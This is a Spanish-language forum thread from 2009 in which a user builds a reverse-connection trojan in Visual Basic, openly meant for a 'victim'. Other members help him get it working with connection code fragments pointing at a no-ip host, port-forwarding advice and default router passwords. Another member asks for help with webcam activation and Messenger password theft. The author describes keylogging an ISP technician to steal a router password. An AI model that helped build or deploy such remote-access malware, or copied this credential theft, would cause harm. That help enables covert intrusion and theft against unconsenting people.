Título: Ayuda Troyano conexion inversa Publicado por: sircam666 en 24 Junio 2009, 00:57 am Saludos
regreso a este foro despues de ojearlo hace ya bastante tiempo para ver si alguien me puede ayudar con un problema, estoy creando un troyano en VB de conexion inversa y pues tecnicamente ya termine, pero las pruebas las estaba realizando en el mismo PC, es decir el winsock se conectaba a la IP local, entonces luego cambie por un dominio en noip.com, dado que mi IP es dinamica y ya tenia intenciones de enviarlo a la victima, pero antes de enviarlo, decidi probar en la misma PC ( no se si es por eso..) y pues puse el programa a la escucha y ejecute el otro que se deberia conectar pero no paso nada... entonces para mirar que pasaba puse un Msgbox que me indicaba el estado de conexion y me arrojo 4, mire y dice que es Resolviendo Host, y pues la verdad no se que significa XD, ni tampoco como arreglarlo jeje, agradezco mucho a el que me pueda colaborar, es mi primer troyano usando el CSocketMaster , y creo que me estaba quedando bien jejeje Gracias de antemano Título: Re: Ayuda Troyano conexion inversa Publicado por: sircam666 en 24 Junio 2009, 03:51 am Vamos, nadie me ayuda XD :silbar:
jeje Título: Re: Ayuda Troyano conexion inversa Publicado por: fede_cp en 24 Junio 2009, 04:49 am buenas, lo que te recomiendo para ayudarte con mas precicion es que dejes tu codigo de como hiciste la conexion, y fijate de que el CScoketMaster lo hayas bajado de la pagina oficial
saludos Título: Re: Ayuda Troyano conexion inversa Publicado por: sircam666 en 24 Junio 2009, 18:21 pm en ese caso pongo el fracmento de codigo que se supone coloca a la escucha el Cliente
Private Sub Command1_Click() ws2.CloseSck ws2.Protocol = sckTCPProtocol ws2.LocalPort = 5548 ws2.Listen End Sub y el otro esta en un timer Private Sub Timer1_Timer() If Not WS.State = 7 Then WS.CloseSck WS.RemotePort = 5548 WS.RemoteHost = "sircam66.no-ip.biz" WS.Connect Else Timer1.Enabled = False End If End Sub y creo que ese seria el pedacito que importa, de todas formas, puedes pasarme la pagina oficial del CSocketMAster Gracias Título: Re: Ayuda Troyano conexion inversa Publicado por: fede_cp en 24 Junio 2009, 18:52 pm el code está bien lo que está fallando es el no-ip.. te doy una sugerencia...
porque no le decis a algún voluntario XD(amigo tuyo o algo) y vas probando cada vez que estes en duda, ahora hace esto: en vez de poner tu no-ip pone tu ip dinámica común (no vayas a probar con "127.0.0.1" :P) jaja y despues pusiste el : Código
y despues en el form_load: Código
y pone un label en el cliente o lo que quieras que sea Código
un saludo Título: Re: Ayuda Troyano conexion inversa Publicado por: sircam666 en 24 Junio 2009, 22:46 pm Saludos
bueno probe lo que me dijiste y no funciono no se porque :huh: le cambie el dominio de no-ip por mi ip se lo envie a mi amigo y le deje el msgbox que muestra el estado de la conexión, entoces coloce a escuchar el programa en mi pc y le dije a mi compañero que lo ejecutara y bueno le salieron los mensajes de el estado y siempre era 6, osea conectando, y no se conectaba igual cada vez que el le daba aceptar a el Msgbox se supone que se debia interntar conectar pero no sirvio, la verdad no tengo idea......... la otra duda que me surgio ahora es que el winsock tiene otro protocolo que es UDP y quisiera saber si con este protocolo se podria hacer un troyano, la verdad se muy poco acerca de este pero, me nace la duda Gracias Título: Re: Ayuda Troyano conexion inversa Publicado por: BlackZeroX en 24 Junio 2009, 23:13 pm Este es un ejemplo con CSocketPlus es igual que el CSocketMaster solo que:
CSocketPlu= Usa Arrays CSocketMaster= No usa Array PERO SUS EVENTOS SON LOS MISMOS Tomando en cuenta la diferencia de INDEX A lo que voy es que pruebes con poner el ConnectionRequestID: Para CSocketMaster: Revisa este por que no cuento con los archivos del CSocketMaster asi que deduci lo siguiente...¡! Código
Para CSocketPlus Código
Como viste la unica diferencia es que en uno siempre se maneja una variable index (CSocketPluys) y en otro no (CSocketMaster). Para ver si esta conectado o no sin usar timer en donde usas el Sock con el evento Connect es decir el cliente no el servidor (en el source donde espesificas el ip a conectar). puedes meter estos eventos CSocketMaster: Código
CSocketPlus Código
P.D.: Con respecto a la DNS sea cual sea (No-ip,dyndns o como sea "X") deberias rectificar los puetos que deberias abrir para tal acción, tanto en firewall de windows como de av como los de router si llegases a usar (Esto va en su foro correspondiente). Dulces Lunas¡! Título: Re: Ayuda Troyano conexion inversa Publicado por: sircam666 en 24 Junio 2009, 23:49 pm Gracias, igual ahora me voy de viaje espero llegar con nuevas energias para terminar ese troyano, talves tenga que volver a el papel y diseñhazlo de nuevo con el CSocketPlus
Gracias Título: Re: Ayuda Troyano conexion inversa Publicado por: seba123neo en 25 Junio 2009, 04:08 am que ganas ░▒▓BlackZeroҖ▓▒░...reconozoco tu ganas de ayudar...pero habiendo tantos ejemplos basicos de estos "programas" de troyanos suelto en internet...ya no es ayudar sino dar en bandeja...que se "maten" buscando en internet vos no te preocupes...ya todos estos temas que preguntan como hacer un troyano ya todos los foreros debemos saber que tienen que buscar en internet otra no hay...pero ni le des mas codigo que lo busquen como nosotros tuvimos que buscarlo algun dia...porque sino van a venir a preguntar cualuquier "duda" y nosotros los "bulu del foro" le vamos a contestar...esto no va para este tema ..sino para todos los temas que haya asi igual en el foro...ya lo dije alguna vez..pero ni caso hacen...
saludos. Título: Re: Ayuda Troyano conexion inversa Publicado por: mr_marley en 26 Junio 2009, 21:04 pm HOla sabes yo tambien me estoy programando un troyano si me pudieras ayudar con algunas funciones como prenderle la webcam.. sacar el password local del messenger
algo By:Marley87 Título: Re: Ayuda Troyano conexion inversa Publicado por: ssccaann43 © en 26 Junio 2009, 21:52 pm Ya hay mucho codigo publicado sobre password del msn y más sobre troyanos.
Es tan dificil usarlo? (http://foro.elhacker.net/Themes/converted/images/spanish/search.gif) Título: Re: Ayuda Troyano conexion inversa Publicado por: sircam666 en 4 Julio 2009, 03:24 am jeje, no creo que sea servir en bandeja de plata como dices, pues detodos modos para eso se supone que esta el foro, imagina que viniera alguien a preguntar y la respuesta fuera simplemente, "matate buscando en internet"
Gracias Título: Re: Ayuda Troyano conexion inversa Publicado por: Spider-Net en 4 Julio 2009, 10:21 am Yo creo que tu problema es que te encuentras detrás de un router y no has redireccionado el tráfico que entra por tu ip a tu ip local. Entra en la configuración de tu Router y busca "Port Forwarding" o NAT o algo así y redirecciona el tráfico del puerto de tu troyano a tu IP local, seguramente sea ese el problema y no de programación.
Saludos! Título: Re: Ayuda Troyano conexion inversa Publicado por: fede_cp en 4 Julio 2009, 23:53 pm pero te funciono sircam666??? porque no dijiste todavía si el troyano conecta
un saludo Título: Re: Ayuda Troyano conexion inversa Publicado por: sircam666 en 5 Julio 2009, 01:23 am Saludos
la verdad no me a querido conectar de ningun modo, para probar cree un sencillo porgrama de chat como los que usan para ejemplificar el uso de winsock, y se lo envie a un amigo y coloque a la escucha y le dije que se conetara a el puerto que puse a escuchar y a mi ip directamente ni siquiera a el dominio de no-ip y pues no sirvio :-\ estoy a punto de arrojar el pc por la ventana dejo el codigo para ver que ise mal o que rayos pasa Código: Option Explicit Código:
Gracias por su ayuda Título: Re: Ayuda Troyano conexion inversa Publicado por: Spider-Net en 5 Julio 2009, 11:24 am Gracias por ignorarme, pero cada vez tengo más claro que tu error es que no has mapeado el puerto que pones a la escucha y no de programación... -.-
"No hay peor ciego que el que no quiere ver..." Título: Re: Ayuda Troyano conexion inversa Publicado por: sircam666 en 6 Julio 2009, 02:03 am Gracias por responder jeje no me fije antes,
pero ahora tengo un problema no puedo entrar a la configuracion de mi router, en mi ISP no me dieron la clave y pues hay... no tengo idea bueno si alguien sabe como le ago para entrar mi router es un Echolife Hg520s Gracias Título: Re: Ayuda Troyano conexion inversa Publicado por: seba123neo en 6 Julio 2009, 02:47 am el acceso al router debe estar en el manual del router...con buscar en internet en 10 segundos encontras como acceder a la configuracion de cualquier router...
Título: Re: Ayuda Troyano conexion inversa Publicado por: fede_cp en 6 Julio 2009, 18:52 pm Probaste resetearlo y poner el pass original, según por ahi dicen que es:
entra con explorer a la dir 10.0.0.2/admin.html Administrador = admin Clave = tomenague (a mi me funco) despues aparece la "advanced configuration" y ahi hay mil opciones eso lo encontre en google despues de buscar 10 segundo como dice neo... tomalo como quieras :huh: adios Título: Re: Ayuda Troyano conexion inversa Publicado por: seba123neo en 7 Julio 2009, 01:29 am Probaste resetearlo y poner el pass original, según por ahi dicen que es: entra con explorer a la dir 10.0.0.2/admin.html Administrador = admin Clave = tomenague (a mi me funco) despues aparece la "advanced configuration" y ahi hay mil opciones eso lo encontre en google despues de buscar 10 segundo como dice neo... tomalo como quieras :huh: adios claro, pero eso es para tu router que si no me equivoco por el usuario y contraseña el tuyo es un pirelli :P. casi siempre debes ir a NAT o en virtual server depende el router...pero busca en internet la marca y ahi dice el usuario y contraseña y la ip del router que debes poner para acceder a la configuracion... saludos. Título: Re: Ayuda Troyano conexion inversa Publicado por: fede_cp en 7 Julio 2009, 16:05 pm seba123neo , busque para su router ::) jaja, el nombre del router y como entrar a la configuracion en google y apareció eso, con el mismo nombre de router y modelo
saludos Título: Re: Ayuda Troyano conexion inversa Publicado por: sircam666 en 8 Julio 2009, 01:15 am Saludos
pues en google encontre las claves por defecto pero mi isp la cambio, y cuando resetee el modem desconfigure la red inalambria y tuve que llamar el tecnico, y cuadno vino le tenia preparado un keylogger y le saque la clave jeje bueno ahora con la clave voy a ver que ago y luego les cuento Título: Re: Ayuda Troyano conexion inversa Publicado por: BlackZeroX en 8 Julio 2009, 01:34 am Saludos pues en google encontre las claves por defecto pero mi isp la cambio, y cuando resetee el modem desconfigure la red inalambria y tuve que llamar el tecnico, y cuadno vino le tenia preparado un keylogger y le saque la clave jeje bueno ahora con la clave voy a ver que hago y luego les cuento Debes exigir que te proporcionen dichos datos, o de lo contrario para que demonios te dan un servicio si te limitan y lo peor aun LES PAGAS.¡! P.D.: Ale A Cortar Cabezas Título: Re: Ayuda Troyano conexion inversa Publicado por: sircam666 en 8 Julio 2009, 02:12 am jeje
pues eso hice, llame a el ISp pero no me quicieron suministrar los datos disque por razones de seguridad, en fin ahora estoy mirando lo de redireccionar el trafico y dandole unos retoques a mi troyano Gracias Título: Re: Ayuda Troyano conexion inversa Publicado por: El-Jedi en 9 Julio 2009, 05:32 am Mientras no ingreses al router no podras redireccionar los puertos por defecto y eso hara imposible que corra algun troyano me explico por ejemplo el router por defecto trae 192.168.1.1 lo que tienes que hacer es abrir puertos que usa tu troyano y redireccionar a tu pc que por defecto suponiendo sea una sola maquina sera 192.168.1.2 y abres los puertos Nat ejem el 5240 luego sacas una cuenta No-ip te logueas y activas el DUC todo esta explicado en la sección Analisis y diseño del Malware.
Saludos Título: Re: Ayuda Troyano conexion inversa Publicado por: sircam666 en 9 Julio 2009, 17:10 pm Gracias a todos
por fin logre conectarlo ahora voy a mejorar unas cosas y estara listo mitroyano |